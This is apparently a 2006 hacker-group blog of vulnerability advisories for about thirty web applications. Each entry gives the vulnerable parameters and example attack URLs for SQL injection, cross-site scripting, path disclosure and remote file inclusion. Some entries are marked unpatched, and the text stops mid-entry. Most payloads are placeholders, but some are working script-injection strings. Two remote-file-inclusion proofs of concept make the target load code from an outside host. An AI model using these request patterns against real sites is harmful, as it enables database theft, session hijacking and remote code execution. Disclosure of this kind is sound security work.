by r0t,der4444,cembo,VietMafia

Sunday, April 30, 2006

Barracuda vuln.

###############################################
Vuln. discovered by : r0t
Date: 30 april 2006
vendor:www.boonex.com/products/barracuda/
affected versions:1.1 and prior
###############################################


Vuln. Description:

Barracuda contains a flaw that allows a remote sql injection attacks.Input passed to the "link_dir_target" and "link_id_target" parameter in "index.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


examples:

/index.php?sid=[user_hash]&location=link_edit
&link_dir_target=[SQL]

/index.php?sid=[user_hash]&location=link_edit
&link_dir_target=1&link_id_target=[SQL]




+ Bonnus:

/index.php?location=[localfile]


###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

MaxTrade sql inj.

###############################################
Vuln. discovered by : r0t
Date: 30 april 2006
vendorlink:http://avalonbg.com/en_soft.html
affected versions:1.0.1 and prior
###############################################

Vuln. Description:

MaxTrade contains a flaw that allows a remote sql injection attacks.Input passed to the "categori" and "stranica" parameter in "pocategories.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


examples:

/pocategories.php?stranica=categories&categori=[SQL]
/pocategories.php?stranica=[SQL]

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

RT: Request Tracker vuln.

###############################################
Vuln. discovered by : r0t
Date: 30 april 2006
vendor:www.bestpractical.com/?rt=3.5.HEAD
affected versions:RT 3.5.HEAD
###############################################

Vuln. Description:

RT contains a flaw that may lead to an unauthorized information disclosure. The issue is triggered when a remote attacker submits requests in "Rows" parameter in "/Dist/Display.html".
Which will disclose the software's installation path resulting in a loss of confidentiality. While such information is relatively low risk, it is often useful in carrying out additional, more focused attacks.


example:

/Dist/Display.html?Status=Active&Name=google&Rows=[CODE]

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

GoogleStore XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 30 april 2006
vendor:http://google.com/
affected versions:last/actual
###############################################

Vuln. Description:

GoogleStore contains a flaw that allows a remote cross site scripting
attack. This flaw exists because input passed to "code" parameter in
"/popups/view.asp" isn't properly sanitised before being returned to
the user.
This could allow a user to create a specially crafted URL that would
execute arbitrary code in a user's browser within the trust relationship
between the browser and the server, leading to a loss of integrity.

example:

http://www.googlestore.com/CA
/popups/view.asp?code=%22%3Cscr
ipt%3Ealert('r0t')%3C/script%3E



###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
Status:
Reported trought cpan.org tracker
http://rt.cpan.org/Public/Bug/Display.html?id=18990
###############################################
More information @ unsecured-systems.com/forum/

OrbitHYIP XSS

###############################################
Vuln. discovered by : r0t
Date: 30 april 2006
vendor:www.orbitscripts.com/orbithyip_overview.html
affected versions:2.0 and prior
###############################################

Vuln. Description:

OrbitHYIP contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "referral" parameter in "signup.php" and input passed to "id" parameter in "members.php" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

examples:

/signup.php?referral=[XSS]
/members.php?login=r0t&p=pwd&func=useinvestplan&id=[XSS]


###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Pinnacle Cart XSS

###############################################
Vuln. discovered by : r0t
Date: 30 april 2006
vendorlink:http://www.pinnaclecart.com/
affected versions:3.33 and prior
###############################################

Vuln. Description:

Pinnacle Cart contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "setbackurl" parameter in "index.php" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

example:

/index.php?p=&address_id=&setbackurl=[XSS]


###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

CPS <=3.4.0 XSS

###############################################
Vuln. discovered by : r0t
Date: 30 april 2006
vendorlink:http://www.cps-project.org/
affected versions:3.4.0 and prior
###############################################


Vuln. Description:

CPS contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "pos" paremeter isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

example:

/popup_image?pos=[XSS]

Also with error message attacker will get full install path and other info.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Friday, April 28, 2006

Kmail <=2.3 vuln.

###############################################
Vulnerability discovered by : r0t
Date: 28 april 2006
vendorlink:www.webofall.com/displaynews.php?id=4
affected versions:2.3 and prior
###############################################


Vuln. Description:


1. Multiple Cross-Site Scripting attack vulnerabilities.

Kmail contains a flaws that allows a remote cross site scripting attack. Those flaws exists because input passed to "id" paremeter in "main.php" and input passed to "ordner" paremeter in "main.php","webdisk.php" and input passed to "draft" paremeter in "compose.php" and input passed to "m","y" paremeter in "calendar.php" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


examples:

/main.php?action=showmail&id=[XSS]&bmsession
=b77f6a49569a0e6e2d35a8c14cd3ace2

/main.php?ordner=[XSS]&bmsession=1f2a3aeb01f
d5253be322a704e53469f

/compose.php?bmsession=1f2a3aeb01fd5253be32
2a704e53469f&draft=[XSS]

/webdisk.php?bmsession=1f2a3aeb01fd5253be32
2a704e53469f&ordner=[XSS]

/calendar.php?action=viewMonth&m=[XSS]&y=200
6&bmsession=1f2a3aeb01fd5253be322a704e53469f

/calendar.php?action=viewMonth&m=5&y=[XSS]&b
msession=1f2a3aeb01fd5253be322a704e53469f



2.Full Path Disclosure.

example:

/calendar.php?d=[CODE]&m=&y=&bmsession=5825
d89388de35f8f65ec106c6e3537b


###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Thursday, April 27, 2006

Open WebMail <=2.51 XSS vuln.

###############################################
Vulnerability discovered by : r0t
Date: 27 april 2006
vendorlink:http://openwebmail.org/
affected versions:2.51 and prior
###############################################


Vuln. Description:


Open WebMail contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "sessionid" paremeter in "openwebmail-send.pl",
"openwebmail-advsearch.pl","openwebmail-folder.pl","openwebmail-prefs.pl",
"openwebmail-abook.pl","openwebmail-main.pl","openwebmail-read.pl",
"openwebmail-cal.pl","openwebmail-webdisk.pl" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

examples:

/openwebmail-send.pl?sessionid=[XSS]
/openwebmail-advsearch.pl?sessionid=[XSS]
/openwebmail-folder.pl?action=editfolders&sessionid=[XSS]
/openwebmail-prefs.pl?action=editprefs&sessionid=[XSS]
/openwebmail-abook.pl?sessionid=[XSS]
/openwebmail-main.pl?sessionid=[XSS]
/openwebmail-read.pl?sessionid=[XSS]
/openwebmail-cal.pl?sessionid=[XSS]
/openwebmail-webdisk.pl?action=showdir&sessionid=[XSS]


###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Tuesday, April 25, 2006

QuickEStore 7.9 vuln.

###############################################
Vuln. discovered by : r0t
Date: 25 april 2006
vendorlink:www.quickestore.com
affected versions:7.9 and previous
###############################################


Vuln. Description:


1. SQL Injection vuln.

QuickEStore contains a flaw that allows a remote sql injection attacks.Input passed to the "OrderID" parameter in "shipping.cfm","checkout.cfm" and input passed to the "ItemID" parameter in "proddetail.cfm" and input passed to the "SubCatID" parameter in "index.cfm" and input passed to the "CategoryID" parameter in "prodpage.cfm" isn't properly sanitised before being used in a SQL query and Input passed to the "ProdID" parameter in "Details.cfm" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

examples:

/prodpage.cfm?CFID=&CFTOKEN=&CategoryID=[SQL]
/index.cfm?CFID=1&CFTOKEN=1&SubCatID=[SQL]
/proddetail.cfm?CFID=1&CFTOKEN=1&ItemID=[SQL]
/checkout.cfm?CFID=&CFTOKEN=&OrderID=[SQL]
/shipping.cfm?CFID=&CFTOKEN=&OrderID=[SQL]



2. Full Path Disclosure.

The problem is that it is possible to disclose the full path to the installation by supplying an invalid parameter of those file paremeters wich are affected to sql injection attacks(look at 1 vuln.).

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Cartweaver ColdFusion vuln.

###############################################
Vuln. discovered by : r0t
Date: 25 april 2006
vendorlink:www.cartweaver.com
affected versions:2.16.11 and previous
###############################################


Vuln. Description:


1. SQL Injection vuln.

Cartweaver ColdFusion contains a flaw that allows a remote sql injection attacks.Input passed to the "category","keywords" parameter in "Results.cfm" isn't properly sanitised before being used in a SQL query and Input passed to the "ProdID" parameter in "Details.cfm" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

examples:

/Results.cfm?category=[SQL]
/Results.cfm?keywords=[SQL]
/Details.cfm?ProdID=[SQL]




2. Full Path Disclosure.

The problem is that it is possible to disclose the full path to the installation by supplying an invalid "secondary","PageNum_Results","category","keywords" parameter in "Results.cfm" and "ProdID" parameter in "Details.cfm" .

examples:

/Results.cfm?PageNum_Results=&category=&secondary=[CODE]
/Results.cfm?PageNum_Results=[CODE]
/Details.cfm?ProdID=[CODE]
/Results.cfm?category=[CODE]
/Results.cfm?keywords=[CODE]
###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

ampleShop™ eCommerce Software vuln.

###############################################
Vuln. discovered by : r0t
Date: 25 april 2006
vendor:www.amplecom.com/
affected versions:2.1 and previous
###############################################


Vuln. Description:

ampleShop™ contains a flaw that allows a remote sql injection attacks.Input passed to the "RecordID" parameter in "Customeraddresses_RecordAction.cfm" and in "youraccount.cfm" isn't properly sanitised before being used in a SQL query.
Input passed to the "solus" parameter in "detail.cfm" isn't properly sanitised before being used in a SQL query.
Input passed to the "cat" parameter in "category.cfm" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


examples:

/Customeraddresses_RecordAction.cfm?RecordID
=1[SQL]&CustomerID=6&set=yes

/youraccount.cfm?RecordID=[SQL]

/category.cfm?cat=[SQL]

/detail.cfm?solus=[SQL]

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Saturday, April 22, 2006

logMethods XSS vuln.

logMethods XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 22 april 2006
vendorlink:http://logmethods.com/
affected versions:0.9 and prior
###############################################


Vuln. Description:

logMethods contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "kwd" paremeter in "/lms/a2z.jsp" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Friday, April 21, 2006

phpLDAPadmin multiple vuln.

phpLDAPadmin vuln.

###############################################
Vuln. discovered by : r0t
Date: 21 april 2006
vendorlink:http://phpldapadmin.sourceforge.net/
affected versions:phpLDAPadmin 0.9.8 and prior
###############################################

Vuln. Description:

phpLDAPadmin contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "dn" paremeter in "compare_form.php",
"copy_form.php","rename_form.php","template_engine.php",
"delete_form.php" isn't properly sanitised before being returned to the user.
And input passed to "scope" parameter in "search.php" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


examples:

/compare_form.php?server_id=0&dn=%22%3Cscript
%3Ealert('r0t')%3C/script%3E

/copy_form.php?server_id=0&dn=%22%3Cscript%3E
alert('r0t')%3C/script%3E

/rename_form.php?server_id=0&dn=%22%3Cscript
%3Ealert('r0t')%3C/script%3E

/template_engine.php?server_id=0&dn=%22%3Cs
cript%3Ealert('r0t')%3C/script%3E

/delete_form.php?server_id=0&dn=%22%3Cscript
%3Ealert('r0t')%3C/script%3E

/search.php?server_id=0&search=true&filter=
objectClass%3D%2A&base_dn=cn%3Dtoto%2Cdc%3D
example%2Cdc%3Dcom&form=advanced&scope=%22%
3Cscript%3Ealert('r0t')%3C/script%3E


And there also script insertion vuln. or html injection:

Like i say , take in example "/template_engine.php" and let input in
Container DN : [XSS]
Machine Name: [XSS]
UID Number: [XSS]
Those fields isn't sanitised before being stored in the vuln. system. This can be exploited to execute arbitrary script code in a user's browser session in context of an affected website when a malicious system entry is viewed.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Thursday, April 20, 2006

phpMyAdmin XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 20 april 2006
vendorlink:http://www.phpmyadmin.net/
affected versions:
phpMyAdmin 2.8.0.3
phpMyAdmin 2.8.0.2
phpMyAdmin 2.8.1-dev (CVS version)
phpMyAdmin 2.9.0-dev (CVS version)
and prior versions also can be affected
###############################################


Vuln. Description:

phpMyAdmin contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "lang" paremeter in "index.php" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


example:

http://[victim]/phpMyAdmin/index.php?lang=[XSS]

note:
attacker dont must be logged in vuln. system to exploit this vuln.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

AWStats 6.5.x multiple vuln.

###############################################
Vuln. discovered by : r0t
Date: 20 april 2006
vendorlink:http://awstats.sourceforge.net/
affected versions: 6.5 (build 1.857) and prior
###############################################


Vuln. Description:

1. Cross-Site Scripting

AWStats contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "refererpagesfilter","refererpagesfilterex",
"urlfilterex","urlfilter","hostfilter","hostfilterex" paremeter in "awstats.pl" isn't properly sanitised before being returned to the user.This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


examples:

/awstats.pl?refererpagesfilter=[XSS]&refererpages
filterex=&output=refererpages&config=unsecured-s
ystems.com&year=2006&month=all

/awstats.pl?refererpagesfilter=&refererpagesfilt
erex=[XSS]&output=refererpages&config=unsecured
-systems.com&year=2006&month=all

/awstats.pl?urlfilter=&urlfilterex=[XSS]&output=
urlentry&config=unsecured-systems.com&year=200
6&month=all

/awstats.pl?urlfilter=[XSS]&urlfilterex=&output=
urlentry&config=unsecured-systems.com&year=200
6&month=all

/awstats.pl?hostfilter=[XSS]&hostfilterex=&output=
allhosts&config=unsecured-systems.com&year=2006&
month=all

/awstats.pl?hostfilter=&hostfilterex=[XSS]&output
=allhosts&config=unsecured-systems.com&year=200
6&month=all



2.Full Path Disclosure.

examples:

/awstats.pl?month=&year=[CODE]
/awstats.pl?pluginmode=[CODE]
/awstats.pl?month=[CODE]


###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
its just today's update..:)
###############################################
More information @ unsecured-systems.com/forum/

W2B Online Banking vuln.

###############################################
Vuln. discovered by : r0t
Date: 20 april 2006
vendorlink:www.w2b.ru/OnlineBanking/index.php
affected versions:last/actual
###############################################

Vuln. Description:

W2B Online Banking contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "SID" paremeter isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.
Also doing XSS attack test attacker will get full path disclosure.


example:


/?ilang=eng&SID=&[XSS]



+

/?ilang=rus&SID=r0t_LOve_Banking_software_like_this_one!

/?ilang=r0t_LOve_Banking_software_like_this_one!

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

I-Rater Platinum - Remote File Inclusion Vuln

=================================
developer's site: www.i-rater.com
script: I-Rater Platinum
risk: critical
status: unpatched
discovered by: VietMafia
=================================

Vuln. Description:

This flaw is due to an input validation error in the "include/common.php"(line 3,4) that does not validate the "include_path" variable properly. Remote attackers can include
malicious scripts and execute arbitrary commands with the privileges of the web server

PoC:

http://[target]/[path]/include/common.php?
include_path=http://unsecured-systems.com/forum/

Net Clubs Pro XSS vuln

###############################################
Vuln. discovered by : r0t
Date: 20 april 2006
vendor:www.aasimedia.com/nc/nc.shtml
affected versions:4.0 and prior
###############################################

Vuln. Description:

Net Clubs Pro contains a flaws that allows a remote cross site scripting attacks.
Those flaws exists because input passed to "onuser","pass","chatsys","room","username","to" parameter in
"/vchat/scripts/sendim.cgi" and input passed to"username" paremter in "/vchat/scripts/imessage.cgi" and input passed to"password" parameter in "login.cgi" and input passed to "cat_id" parameter in "classifieds/viewcat.cgi" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


examples:

//cgi-bin/netclubs//vchat/scripts/imessage.cgi?
toto=&to=&sentby=&fromuser=r0t&command=change
font&username=[XSS]

//cgi-bin/netclubs//vchat/scripts/sendim.cgi?
onuser=[XSS]

//cgi-bin/netclubs//vchat/scripts/sendim.cgi?
onuser=r0t&pass=[XSS]

//cgi-bin/netclubs//vchat/scripts/sendim.cgi?
onuser=r0t&pass=&chatsys=[XSS]

//cgi-bin/netclubs//vchat/scripts/sendim.cgi?
onuser=r0t&pass=&chatsys=netclubs&searchstri
ng=netclubs&room=[XSS]

//cgi-bin/netclubs//vchat/scripts/sendim.cgi?
onuser=r0t&pass=&chatsys=netclubs&searchstri
ng=netclubs&room=&username=[XSS]

//cgi-bin/netclubs//vchat/scripts/sendim.cgi?
onuser=r0t&pass=&chatsys=netclubs&searchstri
ng=netclubs&room=&username=&to=[XSS]

//cgi-bin/netclubs//login.cgi?username=r0t&
password=[XSS]


###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
gr33tZ:der4444,VietMafia,cembo!
###############################################
More information @ unsecured-systems.com/forum/

Portal Pack 6 XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 20 april 2006
vendor:www.kcscripts.com/scripts/portal-pack.htm
affected versions:6.0 and prior
###############################################


Vuln. Description:


Portal Pack contains a flaws that allows a remote cross site scripting attacks.
Those flaws exists because input passed to "sort_order" parameter in "calendar/Visitor.cgi" and "news/NsVisitor.cgi" and input passed to"q" parameter in "search/search.cgi" and input passed to "cat_id" parameter in "classifieds/viewcat.cgi" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


examples:

/cgi-bin/calendar/Visitor.cgi?job=view_event&eventNo=
0&sort_order=[XSS]

/cgi-bin/news/NsVisitor.cgi?job=view_article&articleNo=
0&sort_order=[XSS]

/cgi-bin/search/search.cgi?q=[XSS]

/cgi-bin/classifieds/viewcat.cgi?cat_id=[XSS]


###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Wednesday, April 19, 2006

TotalCalendar - Remote code execution bug

====================================
developer's site: www.sweetphp.com
script: TotalCalendar
risk: critical
status: unpatched
discovered by: VietMafia
====================================

Vuln. Description:

This flaw is due to an input validation error in the "about.php"(line 7) auth.php (line 5)
and some others files that do not validate the "$inc_dir" variable properly. Remote attackers can include
malicious scripts and execute arbitrary commands with the privileges of the web server
Totalcalendar module for PhpNuke is vulnerable as well.

example file: about.php

line 7:
...
require_once($inc_dir."config.php");
...

PoC:

http://[target]/[path]/about.php?
inc_dir=http://unsecured-systems.com/forum/

=====================================
Greetings to r0t,der444 & cembo - : )
=====================================

Visale XSS vuln.

Visale XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 19 april 2006
vendor:http://www.visale.com/
affected versions: 1.0 and previous
###############################################

Vuln. Description:

Visale contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "keyval" paremeter in "pbpgst.cgi" and input passed to "catsubno" paremeter in "pblscg.cgi" and input passed to "listno" paremeter in "pblsmb.cgi" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

examples:

/pbpgst.cgi?keyval=[XSS]
/pblscg.cgi?catsubno=[XSS]
/pblsmb.cgi?cklv=0&listno=[XSS]

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

CommuniMail XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 19 april 2006
vendor:http://www.sibsoft.net/communimail.html
affected versions: 1.2 and previous
###############################################

Vuln. Description:

IntelliLink Pro contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "list_id" paremeter in "mailadmin.cgi" and input passed to "form_id" paremeter in "templates.cgi" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

examples:

/cgi-bin/communimail/mailadmin.cgi?saction=
show_contacts&list_id=[XSS]

/cgi-bin/communimail/templates.cgi?saction=
edit_form&form_id=[XSS]

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

IntelliLink Pro XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 19 april 2006
vendor:http://www.smarterscripts.com/intellilink/pro.shtml
affected versions:5.06 and previous
###############################################

Vuln. Description:

IntelliLink Pro contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "url" paremeter in "addlink_lwp.cgi" and input passed to "id","forgotid","forgotpass" paremeters in "edit.cgi" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

examples:


/addlink_lwp.cgi?url=[XSS]
/edit.cgi?id=[XSS]
/edit.cgi?forgotid=[XSS]
/edit.cgi?forgotpass=[XSS]

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

BannerFarm XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 19 april 2006
vendor:www.perlcoders.com/main/scripts.html?script=BannerFarm
affected versions:2.3 and previous
###############################################


Vuln. Description:

BannerFarm contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "aff","cat" paremeter in "banners.cgi" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

examples:

/banners.cgi?aff=[XSS]
/banners.cgi?aff=&cat=[XSS]

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Plexum X5 SQL vuln.

###############################################
Vuln. discovered by : r0t
Date: 19 april 2006
vendorlink:http://www.plexum.com/network/
affected versions:X5 and previous
###############################################


Vuln. Description:

Plexum contains a flaw that allows a remote sql injection attacks.Input passed to the "pagesize","maxrec","startpos" parameters in "plexum.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


examples:

/plexum.php?section=webstats&page=hits&startpos
=15&maxrec=457&pagesize=[SQL]

/plexum.php?section=webstats&page=hits&startpos
=450&maxrec=[SQL]

/plexum.php?section=webstats&page=hits&startpos
=[SQL]

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

PlexCart X3 SQL Inj

PlexCart X3 SQL Injection Vulnerability

###############################################
Vuln. discovered by : r0t
Date: 19 april 2006
vendorlink:www.plexum.com/ecommerce/shopping_cart/
affected versions:X3 and previous
###############################################

Vuln. Description:

PlexCart contains a flaw that allows a remote sql injection attacks.Input passed to the "catid" parameter in "plexcart.pl" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


example:


/plexcart.pl?section=catalog&page=subcat&where=
catalog&catid=[SQL]

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Tuesday, April 18, 2006

AWStats 6.5 vuln.

###############################################
Vuln. discovered by : r0t
Date: 18 april 2006
vendorlink:http://awstats.sourceforge.net
affected versions:AWStats 6.5 (build 1.857) and previous
###############################################


Vuln. Description:


AWStats contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "config" paremeter in "awstats.pl" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

Also doing XSS vuln. check attacker will get full path disclosure.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

xFlow v5.x multiple vuln.

###############################################
Vuln. discovered by : r0t
Date: 18 april 2006
vendorlink:http://www.skymarx.com/affiliate_software.html
affected versions:v5.46.11 and previous
###############################################


Product info:

After over five years of development, the xFlow has become an industry leader amongst membership management softwares, and will continue to dominate. With version 6 in development (written in PHP) and our expanding premier business services, the xFlow and Skymarx Solutions will soon be rivaling the largest software providers in the world.
Designed with flexibility in mind, you can easily customize the xFlow to your exact business needs. Packaged with tons of features, the xFlow contains everything you need to successfully start your own membership based business, or manage a large corporation: customizable member database, full genealogy tracking, transaction system, reporting features, powerful Member's Only Area, support for 28+ payment processors, plus much more.

###############################################



Vuln. Description:





1. SQL inj. vuln.

xFlow contains a flaw that allows a remote sql injection attacks.Input passed to the "position","id" parameters in "index.cgi" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


/members_only/index.cgi?id=4&username=r0t&seed=
rjzzBzfrMplgqQMojRgrnALJMoiUeAdlxswNQvbo&action=
view_downline&level=Direct&position=1[SQL]


/members_only/index.cgi?id=[SQL]&username=r0t&seed=
TfgNxKhyqEELQQQKizBWyVShdbOpfugMaQhpuGqI




2. XSS vuln.

xFlow contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "level","position","id","action","page" paremeter in "index.cgi" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


examples:


/members_only/index.cgi?id=4&username=r0t&seed=
rjzzBzfrMplgqQMojRgrnALJMoiUeAdlxswNQvbo&action=
view_downline&level=[XSS]&position=10


/members_only/index.cgi?id=4&username=r0t&seed=
rjzzBzfrMplgqQMojRgrnALJMoiUeAdlxswNQvbo&action=
view_downline&level=Direct&position=1[XSS]

/members_only/index.cgi?id=[XSS]&username=r0t&seed=
TfgNxKhyqEELQQQKizBWyVShdbOpfugMaQhpuGqI

/members_only/index.cgi?id=4&username=r0t&seed=
rjzzBzfrMplgqQMojRgrnALJMoiUeAdlxswNQvbo&action
=[XSS]&level=&position=10

/customer_area/index.cgi?id=1&username=r0t&seed=
pWltDqcPcLuedZnXTwCNWldbpJmQANHFHfFvveFY&page=[XSS]



3.Full Path Disclosure & info

examples:

/members_only/index.cgi?id=4&username=r0t&seed=
rjzzBzfrMplgqQMojRgrnALJMoiUeAdlxswNQvbo&action
=[CODE]&level=&position=10

/customer_area/index.cgi?id=1&username=r0t&seed=
pWltDqcPcLuedZnXTwCNWldbpJmQANHFHfFvveFY&page=[CODE]

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Leadhound multiple vuln.

###############################################
Vuln. discovered by : r0t
Date: 18 april 2006
vendor:http://www.leadhoundnetwork.com/
affected versions:
Leadhound "Full Remote version"
&
Leadhound LITE 2.1
###############################################



Product info:


# Secure private network - Leadhound technology is hosted in-house at Leadhound's corporate offices. To help ensure maximum performance, a dedicated high performance 128-bit SSL secured server is included as part of the licensing agreement.
# Full control over your affiliates - Each application can be reviewed for your approval, or rejection based on criteria that you set.
# Reliability - Leadhound was designed from the ground up to be fully scalable, and serve 10,000's of affiliates. Our technology is proven, reliable, and an affordable solution.
# Time to market - Save tens of thousands of Dollars in development cost, and countless hours of programming. Our technology is blended seamlessly into your current design.


###############################################

Vuln. Description:

1. Multiple SQL injection vuln.

Leadhound contains a flaws that allows a remote sql injection attacks.Input passed to the "banner" "offset" "sub" "camp_id" "login" "logged" "agent_id" parameters isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

notice: To see Wich paremeter in wich file,pleas look at examples:


/cgi-bin/agent_links.pl?login=r0t&logged=
&camp_id=0&sub=&banner=[SQL]

/cgi-bin/agent_links.pl?login=r0t&logged=
&camp_id=0&sub=&banner='0'&move=1&submit
ted=1&offset=[SQL]

/cgi-bin/agent_transactions_csv.pl?login=
r0t&logged=&camp_id=0&sub=[SQL]

/cgi-bin/agent_transactions.pl?login=r0t&
logged=&submitted=1&offset=[SQL]

/cgi-bin/agent_transactions.pl?login=r0t&
logged=&submitted=1&offset=0&sub=[SQL]

/cgi-bin/agent_subaffiliates.pl?login=r0t&
logged=&submitted=1&offset=[SQL]

/cgi-bin/agent_subaffiliates.pl?login=r0t&
logged=&submitted=1&offset=0&sub=&camp_id=[SQL]

/cgi-bin/agent_subaffiliates.pl?login=r0t&
logged=&submitted=1&offset=0&sub=[SQL]

/cgi-bin/agent_commission_statement.pl?log
in=[SQL]

/cgi-bin/agent_commission_statement.pl?log
